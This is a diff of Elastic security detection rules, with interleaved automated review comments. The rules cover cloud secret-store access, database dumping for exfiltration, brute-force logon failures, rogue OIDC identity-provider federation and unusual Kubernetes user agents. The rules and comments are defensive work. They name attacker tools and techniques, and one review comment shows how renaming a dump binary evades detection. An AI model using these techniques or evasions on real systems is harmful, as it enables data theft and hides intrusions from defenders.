"https://learn.microsoft.com/en-us/azure/key-vault/secrets/about-secrets", - "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack" - ], - "related_integrations": [ - { - "package": "aws", - "version": "^4.0.0" - }, - { - "package": "gcp", - "version": "^2.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - }, - { - "integration": "cloudtrail", - "package": "aws", - "version": "^4.0.0" - }, - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "integration": "platformlogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.aws_account_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_tenant_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_region_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_service_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.cloud_vendor_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.data_source_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.data_stream_namespace_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.events_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.gcp_project_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.tenant_label_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.vendor_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql_priv.aws_user_identity_arn_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.azure_upn_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.client_user_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql_priv.user_values", - "type": "keyword" - }, - { - "ecs": true, - 
"name": "source.ip", - "type": "ip" - } - ], - "risk_score": 73, - "rule_id": "472b4944-d810-43cf-83dc-7d080ae1b8dd", - "setup": "This multi-datasource rule relies on additional configurations from each hyperscaler.\n\n- GCP Audit: [Enable DATA_READ for the Secret Manager API service](https://docs.cloud.google.com/logging/docs/audit/configure-data-access)\n- Azure: [Enable Diagnostic Logging for the Key Vault Service](https://learn.microsoft.com/en-us/azure/key-vault/general/howto-logging?tabs=azure-cli)\n- AWS: Secrets Manager read access is automatically logged by CloudTrail.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: IAM", - "Domain: Storage", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Secrets Manager", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1555", - "name": "Credentials from Password Stores", - "reference": "https://attack.mitre.org/techniques/T1555/", - "subtechnique": [ - { - "id": "T1555.006", - "name": "Cloud Secrets Management Stores", - "reference": "https://attack.mitre.org/techniques/T1555/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "472b4944-d810-43cf-83dc-7d080ae1b8dd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json b/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json new file mode 100644 index 00000000000..47f5f5cd4a4 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Database Dumping Activity", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Database Dumping Activity\n\nThis alert flags a Linux process starting a common database export tool, which matters because these utilities can quickly copy entire datasets into portable files for theft. 
An attacker with shell access may run mysqldump, pg_dump, or mongodump to dump customer records or application data to disk and then transfer the archive off the host over a separate network channel.\n\n### Possible investigation steps\n\n- Review the full command line, parent and ancestor process chain, and execution user to determine whether the dump was launched by approved backup automation, an administrator shell, or an unexpected process such as a web server or scripting interpreter.\n- Validate whether the account and host normally perform database backups by comparing the activity with change windows, cron or systemd timer jobs, deployment scripts, and historical executions on this and similar systems.\n- Identify any dump artifacts created around the alert by looking for new large files, archive or compression activity, staging in temporary directories, or writes to mounted shares that could indicate preparation for transfer.\n- Examine surrounding authentication and network activity for signs of compromise or exfiltration, including recent SSH or VPN access to the host, unusual database logins, and outbound connections or file transfers shortly after the dump began.\n- If the activity is not authorized, isolate the host as appropriate and scope for related activity across the environment by searching for the same user, parent process, command pattern, and follow-on transfer utilities on other systems.\n\n### False positive analysis\n\n- Scheduled backup or maintenance scripts may legitimately run pg_dump, mysqldump, or mongodump on Linux database hosts; confirm the execution user, parent process, and timing match documented cron or systemd jobs and that the output is written to the expected backup location.\n- A DBA or application administrator may manually export data for migration, troubleshooting, or upgrade validation; verify the user account, shell history or change records, and command-line options align with an approved maintenance task and that no 
unusual outbound transfer follows the dump.\n\n### Response and remediation\n\n- Quarantine the affected Linux host from the network except for approved management access, stop any active pg_dump, mysqldump, mariadb-dump, pg_dumpall, or mongodump activity and any follow-on compression or transfer processes, and block the account and destination used to stage the dump.\n- Remove attacker persistence by deleting unauthorized cron jobs, systemd services or timers, startup scripts, SSH authorized_keys entries, web shells, and any scripts or binaries used to create, archive, or move the database export.\n- Revoke and rotate the database credentials, local passwords, SSH keys, and API tokens exposed on the host, then review database users for newly granted backup, export, replication, or superuser privileges and disable anything not explicitly approved.\n- Restore to a known-good state by rebuilding the host or reverting from a trusted image, validating the database against clean backups, and deleting dump files, archives, and copied datasets from temporary directories, mounted shares, and storage buckets.\n- Escalate to incident response immediately if any dump file was transferred to an external server, cloud service, or user workstation, if similar dumping activity is found on other hosts, or if the attacker used a privileged administrator or database account.\n- Harden the environment by limiting dump utilities to approved backup hosts and service accounts, enforcing MFA and least privilege for administrators, restricting outbound network paths from database servers, and alerting on new dump archives or unexpected database export tool execution.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\nprocess.name in (\"pg_dump\", \"pg_dumpall\", \"mysqldump\", \"mariadb-dump\", \"mongodump\")\n", + "references": [ + 
"https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "47fdd8e9-2f53-4648-afbf-0c6dd52f3ce5_1", + "type": "security-rule" +} \ No newline at end of file 
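Review bot: The EQL in the `"query"` line keys solely on `process.name`, so a copied or symlinked dump binary (`cp /usr/bin/mysqldump /tmp/x`) is never seen while every scheduled backup that calls the real tool fires the rule; that trade-off is reasonable at risk_score 21, but the note's false-positive section should say so, e.g. `- This rule matches only on the executable's basename; renamed or copied dump utilities are not detected.` The rule also observes only a process start and never a network transfer, yet the `"description"` claims it detects exfiltration and the `"threat"` block maps to TA0010 / T1048 Exfiltration Over Alternative Protocol; Collection (TA0009) with T1005 Data from Local System or T1074.001 Local Data Staging describes what the query actually sees, so consider re-tagging, or at least rewording the description to `This rule detects execution of database dump utilities (pg_dump, pg_dumpall, mysqldump, mariadb-dump, mongodump) on Linux hosts, which may precede data staging and exfiltration.` The `"setup"` text says the rule requires Elastic Defend while `"index"` and the tags also cover CrowdStrike, SentinelOne and Endgame; a sentence noting those sources also satisfy the rule would avoid confusing operators. Minor: the `"note"` string opens with a space before `## Triage and analysis`, unlike the other guides in this package.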
diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json similarity index 74% rename from packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json rename to packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json index e541a18589a..07e8d6bd93b 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_114.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_118.json 
@@ -5,16 +5,11 @@ ], "description": "Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", + "language": "esql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", + "query": "from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index\n| where event.category == \"authentication\" and host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type == \"Network\" and source.ip is not null and winlog.computer_name is not null and\n not cidr_match(TO_IP(source.ip), \"127.0.0.0/8\", \"::1\") and\n not user.name in (\"ANONYMOUS LOGON\", \"-\") and not user.name like \"*$\" and user.domain != \"NT AUTHORITY\" and\n /*\n noisy failure status codes often associated to authentication misconfiguration\n 0xC000015B - The user has not been granted the 
requested logon type (also called the logon right) at this machine.\n 0XC000005E - There are currently no logon servers available to service the logon request.\n 0XC0000133 - Clocks between DC and other computer too far out of sync.\n 0XC0000192 An attempt was made to logon, but the Netlogon service was not started.\n 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication.\n */\n not winlog.event_data.Status in (\"0xc000015b\", \"0xc000005e\", \"0xc0000133\", \"0xc0000192\", \"0xc00000dc\")\n// truncate the timestamp to a 60-second window\n| eval Esql.time_window = date_trunc(60 seconds, @timestamp)\n| stats Esql.failed_auth_count = COUNT(*),\n Esql.count_distinct_target_user_name = count_distinct(winlog.event_data.TargetUserName),\n Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName),\n Esql.user_domain_values = VALUES(user.domain),\n Esql.error_codes = VALUES(winlog.event_data.Status),\n Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type\n| where Esql.failed_auth_count >= 100 and Esql.count_distinct_target_user_name >= 2\n| eval user.name = MV_FIRST(Esql.target_user_name_values)\n| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.*\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624", 
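Review bot: The new `| where Esql.failed_auth_count >= 100 and Esql.count_distinct_target_user_name >= 2` replaces the EQL `with maxspan=10s ... with runs=10` and changes what the rule detects: a 60-second tumbling `date_trunc` bucket instead of a 10-second sliding sequence, a ten-fold higher count, and a new requirement of at least two distinct target accounts, so sustained guessing against a single account, or a burst that straddles a minute boundary, no longer fires. The investigation guide in this hunk still says the rule "identifies potential password guessing/brute force activity from a single address"; it should state the actual thresholds, e.g. `This rule alerts when a single source address produces 100 or more failed Network logons against at least two distinct accounts within the same 60-second window.` The status-code exclusion also moved from the case-insensitive EQL `:` operator to an exact `in` on lowercase literals (`"0xc000015b"`, ...); if the ingest pipeline delivers `winlog.event_data.Status` with uppercase hex, as the old rule's `0XC000005E` spelling suggests was once observed, the exclusion silently stops working and the misconfiguration noise returns — confirm the normalization or compare on `TO_LOWER(winlog.event_data.Status)`. Minor: `Esql.data_stream_namespace.values` uses a dot where every other aggregate in this query uses the `_values` suffix.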
@@ -33,39 +28,59 @@ ], "required_fields": [ { - "ecs": true, - "name": "event.action", - "type": "keyword" + "ecs": false, + "name": "Esql.count_distinct_target_user_name", + "type": "long" }, { - "ecs": true, - "name": "source.ip", - "type": "ip" + "ecs": false, + "name": "Esql.data_stream_namespace.values", + "type": "keyword" }, { - "ecs": true, - "name": "user.domain", + "ecs": false, + "name": "Esql.error_codes", "type": "keyword" }, { - "ecs": true, - "name": "user.name", + "ecs": false, + "name": "Esql.failed_auth_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.target_user_name_values", "type": "keyword" }, { "ecs": false, - "name": "winlog.computer_name", + "name": "Esql.time_window", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_domain_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", "type": "keyword" }, { "ecs": false, - "name": "winlog.event_data.Status", + "name": "winlog.computer_name", "type": "keyword" }, { "ecs": false, "name": "winlog.logon.type", - "type": "unknown" + "type": "keyword" } ], "risk_score": 47, @@ -109,9 +124,10 @@ ] } ], - "type": "eql", - "version": 114 + "timestamp_override": "event.ingested", + "type": "esql", + "version": 118 }, - "id": "48b6edfc-079d-4907-b43c-baffa243270d_114", + "id": "48b6edfc-079d-4907-b43c-baffa243270d_118", "type": "security-rule" } \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json b/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json deleted file mode 100644 index d749a41a012..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/498e4094-60e7-11f0-8847-f661ea17fbcd_5.json +++ /dev/null 
@@ -1,143 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods.", - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "OIDC Discovery URL Changed in Entra ID", - "note": "## Triage and analysis\n\n### Investigating OIDC Discovery URL Changed in Entra ID\n\nThis rule detects when the OIDC `discoveryUrl` is changed within the Entra ID Authentication Methods policy. Adversaries may leverage this to federate Entra ID with a rogue Identity Provider (IdP) under their control, allowing them to authenticate users with attacker-owned credentials and bypass MFA. This misconfiguration allows an attacker to impersonate valid users by issuing tokens via a third-party OIDC IdP while still passing validation in Entra ID. 
This technique has been publicly demonstrated and has critical implications for trust in federated identity.\n\n### Possible investigation steps\n- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `ipAddress` to identify who made the change and from where.\n- Examine the `old_oidc_discovery` and `new_oidc_discovery` to confirm if the new `discoveryUrl` points to an unexpected or untrusted IdP.\n- Check that the discovery URLs have `.well-known/openid-configuration` endpoints, which are standard for OIDC providers.\n- Use `azure.auditlogs.properties.correlation_id` to pivot to related changes and activity from the same session.\n- Review any subsequent sign-in activity that may have originated from the new IdP.\n- Pivot to additional logs associated with the user or application that made the change to identify any further suspicious activity.\n\n### False positive analysis\n- Entra ID administrators may intentionally reconfigure OIDC trust relationships to support new business requirements.\n- Validate any changes with the identity or security operations team before taking action.\n\n### Response and remediation\n- If the change is unauthorized, immediately revert the discovery URL to the trusted IdP via the Entra ID portal.\n- Revoke tokens or sessions issued after the configuration change.\n- Investigate how the unauthorized change occurred (e.g., compromised account or over-privileged app).\n- Apply conditional access policies and change control procedures to protect IdP configuration changes.\n", - "query": "from logs-azure.auditlogs-* metadata _id, _version, _index\n| where event.action == \"Authentication Methods Policy Update\"\n| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value`, \"\\\\\\\\\", \"\")\n| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace = 
replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value`, \"\\\\\\\\\", \"\")\n| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace \"%{}discoveryUrl\\\":\\\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new}\\\"}%{}\"\n| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace \"%{}discoveryUrl\\\":\\\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old}\\\"}%{}\"\n| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new is not null and Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old is not null\n| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new != Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old\n| keep\n @timestamp,\n event.action,\n event.outcome,\n azure.tenant_id,\n azure.correlation_id,\n azure.auditlogs.properties.activity_datetime,\n azure.auditlogs.properties.operation_type,\n azure.auditlogs.properties.initiated_by.user.userPrincipalName,\n azure.auditlogs.properties.initiated_by.user.displayName,\n azure.auditlogs.properties.initiated_by.user.ipAddress,\n source.geo.city_name,\n source.geo.region_name,\n source.geo.country_name,\n Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new,\n Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old\n", - "references": [ - "https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_datetime", - "type": "date" - }, - 
{ - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.ipAddress", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.operation_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.tenant_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "498e4094-60e7-11f0-8847-f661ea17fbcd", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/", - "subtechnique": [ - { - "id": "T1556.009", - "name": "Conditional Access Policies", - "reference": "https://attack.mitre.org/techniques/T1556/009/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 5 - }, - "id": "498e4094-60e7-11f0-8847-f661ea17fbcd_5", - "type": "security-rule" -} \ No 
newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json b/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json deleted file mode 100644 index 6d4a9a112d8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/4b77d382-b78e-4aae-85a0-8841b80e4fc4_1.json +++ /dev/null 
@@ -1,73 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a forbidden request is made from an unusual user agent in a Kubernetes environment. Adversary tooling may use non-standard or unexpected user agents to interact with the Kubernetes API, which can indicate an attempt to evade detection or blend in with legitimate traffic. In combination with a forbidden request, this behavior can suggest an adversary is attempting to exploit vulnerabilities or misconfigurations in the Kubernetes cluster.", - "index": [ - "logs-kubernetes.audit_logs-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Forbidden Request from Unusual User Agent in Kubernetes", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Forbidden Request from Unusual User Agent in Kubernetes\n\nKubernetes, a container orchestration platform, manages applications across clusters. It uses APIs for communication, which can be targeted by adversaries using atypical user agents to mask malicious activities. These agents may attempt unauthorized actions, exploiting vulnerabilities. The detection rule identifies such anomalies by flagging forbidden requests from non-standard user agents, indicating potential threats.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs to identify the source IP address and user associated with the forbidden request. This can help determine if the request originated from a known or unknown entity.\n- Analyze the user agent string in the audit logs to understand its origin and purpose. 
Cross-reference it with known legitimate user agents to assess its legitimacy.\n- Check for any recent changes or deployments in the Kubernetes environment that might have introduced new user agents or configurations, potentially leading to the forbidden request.\n- Investigate the specific resource or API endpoint that was targeted by the forbidden request to understand what the adversary might have been attempting to access or exploit.\n- Correlate the event with other security logs and alerts to identify any patterns or additional suspicious activities that might indicate a broader attack or reconnaissance effort.\n- Assess the current security posture and configurations of the Kubernetes cluster to identify any vulnerabilities or misconfigurations that could be exploited by adversaries using unusual user agents.\n\n### False positive analysis\n\n- Legitimate internal tools or scripts may use non-standard user agents that are not included in the exclusion list. Review and identify these tools, then update the exclusion list to prevent them from being flagged.\n- Automated processes or third-party integrations might use unique user agents that trigger the rule. Verify these processes and consider adding their user agents to the exclusion list if they are deemed safe.\n- Development or testing environments often use custom user agents for API interactions. 
